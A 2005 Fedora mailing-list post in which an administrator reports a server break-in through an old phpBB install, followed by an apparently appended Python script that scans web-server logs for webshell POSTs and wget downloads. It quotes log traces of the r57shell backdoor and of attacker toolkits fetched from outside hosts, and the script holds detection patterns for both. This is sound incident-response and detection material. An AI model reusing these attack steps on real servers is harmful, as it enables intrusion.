Hacked Server WAS: Strange connection

Tomas Larsson ktl at bornet.net
Wed Jul 20 14:48:21 UTC 2005


> -----Original Message-----
> From: fedora-list-bounces at redhat.com 
> [mailto:fedora-list-bounces at redhat.com] On Behalf Of Levent Duymus
> Sent: Wednesday, July 20, 2005 11:39 AM
> To: For users of Fedora Core releases
> Subject: Re: Strange connection
> 
> 
> also you should give much more detailed report about the suspicious 
> activity if exists.



Conclusion.
This is what I've found.
I'm not running awstats, so it's not responsible.
As it transpired, phpBB must have been used: phpBB 2.0.8. I "forgot" it was
there, it was only used for testing purposes, but someone found it.


Firstly I noticed that I had a strange connection when I ran "netstat -a -v -p -t"

It said that I was connected to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org"


In the httpd access log I found:

172.149.xxx.xxx - r57 [02/Jul/2005:16:05:10 +0200] "POST /phpBB2/r57shell.php HTTP/1.1" 200 11581

This is a backdoor trojan.
It is not linked to any file, so it must have been used by the hacker to gain
access to my server.

In the httpd error logs I found this:

--21:34:47--  http://www.xxxx.ro/www/gulie.tgz
           => `gulie.tgz'
Resolving www.xxxx.ro... 217.10.xxx.xxx
Connecting to www.xxxxx.ro[217.10.xxx.xxx]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 229,187 [application/x-tar]

    0K .......... .......... .......... .......... .......... 22%  119.67 KB/s
   50K .......... .......... .......... .......... .......... 44%  279.43 KB/s
  100K .......... .......... .......... .......... .......... 67%  358.69 KB/s
  150K .......... .......... .......... .......... .......... 89%  304.26 KB/s
  200K .......... .......... ...                             100%  406.82 KB/s

21:34:48 (233.38 KB/s) - "gulie.tgz" saved [229187/229187]

Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html

This one was responsible for the connection to 193.110.95.1:ircd,
"carouge.ch.eu.undernet.org"
It was located in /var/tmp


I also found this in the error-logs
--16:02:53--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Resolving www.yyyy.us... 69.9.yyy.yy
Connecting to www.yyyy.us[69.9.yyy.yyy]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8,179 [application/x-tar]

    0K .......                                               100%   53.66 KB/s

16:02:55 (53.66 KB/s) - "cycomm.tar.gz" saved [8179/8179]

--16:02:55--  http://www.yyyy.us/cycomm.tar.gz
           => `cycomm.tar.gz'
Resolving www.yyyy.us... 69.9.yyy.yy
Connecting to www.yyyy.us[69.9.yyy.yy]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8,179 [application/x-tar]

    0K .......                                               100%   49.24 KB/s

16:02:56 (49.24 KB/s) - "cycomm.tar.gz" saved [8179/8179]

bind: Address already in use
--16:03:36--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Resolving www.yyyy.us... 69.9.yyy.yyy
Connecting to www.yyyy.us[69.9.yyy.yyy]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   75.51 KB/s

16:03:37 (75.51 KB/s) - "roots.tar" saved [30720/30720]

--16:03:37--  http://www.yyyy.us/roots.tar
           => `roots.tar'
Resolving www.yyyy.us... 69.9.yyy.yyy
Connecting to www.yyyy.us[69.9.yyy.yyy]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,720 [application/x-tar]

    0K .......... .......... ..........                      100%   68.40 KB/s

16:03:38 (68.40 KB/s) - "roots.tar" saved [30720/30720]

error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
Cant open port
Warning: bad syntax, perhaps a bogus '-'? See
http://procps.sf.net/faq.html
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key

These last ones have left no trace on the hard disks at all.

Anyway, I have backed up the server for now; I'll reinstall in the near future, I think,
but need to download the latest Core first.

With best regards

Tomas Larsson
Sweden

Verus Amicus Est Tamquam Alter Idem
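The two pieces of evidence in the post above (a successful POST to a PHP script that phpBB never shipped, and wget transfer banners from a process the web server spawned, which Apache writes to its error log because child stderr goes there) can be picked out of the logs mechanically. The following is an added example, not code from the post or from phpBB; the sample log lines are constructed to resemble the ones quoted, with placeholder hosts and IPs, and the allow-list of legitimate phpBB2 scripts is an assumption you would instead build from the installed package.

```python
"""Triage helpers for the two indicators in the post: a POST to an unknown PHP
script inside the forum's docroot, and wget/sysctl/ps noise in httpd's error log.
Added example; sample data below is constructed, not taken from a real server."""
import re
from dataclasses import dataclass

# Apache common/combined log prefix: ip ident user [ts] "METHOD path proto" status size
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
# wget banners as they appear in the post; "sparad" is the Swedish-locale "saved".
WGET_START_RE = re.compile(r'^--\d{2}:\d{2}:\d{2}--\s+(?P<url>\S+)')
WGET_DONE_RE = re.compile(
    r'^\d{2}:\d{2}:\d{2} \([^)]+\) - [`"\'](?P<file>[^`"\']+)[`"\'] '
    r'(?:saved|sparad) \[(?P<got>\d+)/(?P<total>\d+)\]'
)
# Other stderr noise from tools the attacker ran under httpd (all quoted in the post).
STDERR_MARKERS = (
    "Warning: bad syntax, perhaps a bogus '-'?",  # procps ps(1) given an odd argument form
    "is an unknown key",                          # sysctl(8) asked for a key this kernel lacks
    "bind: Address already in use",
    "Cant open port",
)
# Assumption: scripts the deployed phpBB2 actually ships at the forum root. Build this
# list from the installed package (e.g. rpm -ql / the release tarball), not from memory.
KNOWN_PHPBB2_SCRIPTS = {
    "index.php", "login.php", "posting.php", "viewtopic.php", "viewforum.php",
    "profile.php", "privmsg.php", "search.php", "memberlist.php", "faq.php",
}


@dataclass
class Finding:
    kind: str      # webshell_post | unknown_php_script | wget_download | tool_stderr
    line_no: int   # 1-based line in the scanned log
    detail: str


def scan_access_log(lines, app_prefix="/phpBB2/", known_scripts=KNOWN_PHPBB2_SCRIPTS):
    """Flag PHP scripts under app_prefix that the application does not ship.
    A successful POST to one is the exact pattern from the post (r57shell.php)."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if not path.startswith(app_prefix) or not path.endswith(".php"):
            continue
        if path[len(app_prefix):] in known_scripts:
            continue
        if m.group("method") == "POST" and m.group("status").startswith("2"):
            findings.append(Finding("webshell_post", n, f"{m.group('ip')} -> {path}"))
        else:
            findings.append(Finding("unknown_php_script", n,
                                    f"{m.group('method')} {path} {m.group('status')}"))
    return findings


def scan_error_log(lines):
    """Pair wget start/finish banners into download events; flag other tool stderr."""
    findings, pending_url = [], None
    for n, line in enumerate(lines, 1):
        m = WGET_START_RE.match(line)
        if m:
            pending_url = m.group("url")
            continue
        m = WGET_DONE_RE.match(line)
        if m:
            findings.append(Finding("wget_download", n,
                                    f"{pending_url} -> {m.group('file')} ({m.group('got')} bytes)"))
            pending_url = None
            continue
        if any(marker in line for marker in STDERR_MARKERS):
            findings.append(Finding("tool_stderr", n, line.strip()))
    return findings


# Constructed sample input resembling the post's logs (placeholder hosts and IPs).
SAMPLE_ACCESS = [
    '172.149.0.1 - - [02/Jul/2005:16:01:00 +0200] "GET /phpBB2/index.php HTTP/1.1" 200 5123',
    '172.149.0.1 - r57 [02/Jul/2005:16:05:10 +0200] "POST /phpBB2/r57shell.php HTTP/1.1" 200 11581',
    '10.0.0.5 - - [02/Jul/2005:16:06:00 +0200] "GET /phpBB2/viewtopic.php?t=1 HTTP/1.1" 200 4000',
]
SAMPLE_ERROR = [
    "--21:34:47--  http://www.example.ro/www/gulie.tgz",
    "           => `gulie.tgz'",
    "Length: 229,187 [application/x-tar]",
    '21:34:48 (233.38 KB/s) - "gulie.tgz" sparad [229187/229187]',
    "Warning: bad syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html",
    "--16:02:53--  http://www.example.us/cycomm.tar.gz",
    '16:02:55 (53.66 KB/s) - "cycomm.tar.gz" saved [8179/8179]',
    "error: 'kern.ostype' is an unknown key",
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS) + scan_error_log(SAMPLE_ERROR):
        print(f"{f.kind:20} line {f.line_no:3}  {f.detail}")
```

Run it against the real files with something like `scan_access_log(open("/var/log/httpd/access_log"))`; the allow-list approach is what catches a dropped file regardless of its name, while the wget pairing gives you the URLs and sizes to hunt for the payloads (the post found gulie.tgz in /var/tmp) even when the files themselves have since been removed.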